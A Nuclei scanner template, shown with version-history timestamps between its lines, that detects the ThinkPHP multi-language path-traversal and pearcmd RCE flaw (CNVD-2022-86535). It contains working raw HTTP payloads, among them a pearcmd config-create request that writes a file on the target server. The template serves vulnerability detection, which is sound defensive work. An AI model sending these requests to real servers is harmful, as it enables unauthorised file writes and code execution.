2023-06-19 10:41:59 +00:00
id : CNVD-2022-86535
info :
2023-07-05 06:14:31 +00:00
name : ThinkPHP Multi Languag - File Inc & Remote Code Execution (RCE)
2023-06-19 10:41:59 +00:00
author : arliya,ritikchaddha
severity : high
description : |
ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.
reference :
2023-06-19 10:46:36 +00:00
- https://cn-sec.com/archives/1465289.html
- https://blog.csdn.net/qq_60614981/article/details/128724640
2023-06-19 10:41:59 +00:00
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535
2023-06-19 10:46:36 +00:00
metadata :
2023-07-05 06:19:37 +00:00
max-request : 3
2023-06-19 10:46:36 +00:00
verified : true
2023-06-19 10:41:59 +00:00
tags : cnvd,cnvd2022,thinkphp,rce
http :
- raw :
- |
GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1
Host : {{Hostname}}
- |
GET / HTTP/1.1
Host : {{Hostname}}
think-lang : ../../../../../usr/local/php/pearcmd
- |
GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1
Host : {{Hostname}}
matchers-condition : or
matchers :
2023-06-19 10:46:36 +00:00
- type : word
part : set_cookie
words :
- "think_lang=..%2F..%2F..%2F..%2F"
2023-06-19 10:41:59 +00:00
2023-06-19 10:46:36 +00:00
- type : word
part : body_3
words :
- "CONFIGURATION"
- "Successfully created"
condition : and